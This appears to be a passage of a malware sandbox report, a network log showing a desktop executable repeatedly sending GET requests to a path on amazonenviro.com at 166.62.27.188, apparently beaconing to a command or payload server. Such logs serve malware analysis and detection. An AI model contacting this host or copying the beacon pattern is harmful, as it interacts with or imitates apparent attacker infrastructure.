                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:47 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:47 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    19 | 192.168.2.6 | 49998 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:48 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:49 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:48 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    20 | 192.168.2.6 | 50010 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:50 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:51 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:50 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    21 | 192.168.2.6 | 50027 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:52 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:53 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:52 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    22 | 192.168.2.6 | 50029 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:54 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:54 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:54 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    23 | 192.168.2.6 | 50031 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:56 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:56 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:56 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    24 | 192.168.2.6 | 50033 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:58 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:58 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:58 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    25 | 192.168.2.6 | 50035 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:00 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:00 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:00 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    26 | 192.168.2.6 | 50038 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:02 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:02 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:02 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    27 | 192.168.2.6 | 50040 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:04 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:04 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:04 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    28 | 192.168.2.6 | 50042 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:06 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:06 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:06 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    29 | 192.168.2.6 | 50044 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:08 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:08 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:08 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    30 | 192.168.2.6 | 50046 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:10 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:10 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:10 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    31 | 192.168.2.6 | 50048 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:11 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:12 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:12 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    32 | 192.168.2.6 | 50050 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:13 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:14 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:14 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    33 | 192.168.2.6 | 50052 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:15 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:16 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:16 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    34 | 192.168.2.6 | 50055 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:17 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:18 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:18 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    35 | 192.168.2.6 | 50057 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:19 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:20 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:20 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    36 | 192.168.2.6 | 50059 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:21 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:22 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:22 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    37 | 192.168.2.6 | 50061 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:23 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:24 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:24 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    38 | 192.168.2.6 | 50063 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:25 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:26 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:26 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    39 | 192.168.2.6 | 50065 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:27 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:28 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:27 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    40 | 192.168.2.6 | 50067 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:29 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:30 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:29 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    41 | 192.168.2.6 | 50069 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:31 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:32 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:31 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    42 | 192.168.2.6 | 50071 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:33 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:34 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:33 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    43 | 192.168.2.6 | 50073 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:35 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:35 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:35 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    44 | 192.168.2.6 | 50075 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:37 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:37 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:37 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    45 | 192.168.2.6 | 50077 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:39 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:39 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:39 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    46 | 192.168.2.6 | 50079 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:41 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:41 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:41 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    47 | 192.168.2.6 | 50081 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:43 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:43 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:43 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    48 | 192.168.2.6 | 50083 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:44 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:45 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:45 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    49 | 192.168.2.6 | 50085 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:46 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:47 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:47 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    50 | 192.168.2.6 | 50087 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:48 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:49 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:49 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    51 | 192.168.2.6 | 50090 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:50 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:51 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:51 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    52 | 192.168.2.6 | 50092 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:25:52 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:25:53 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:25:53 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
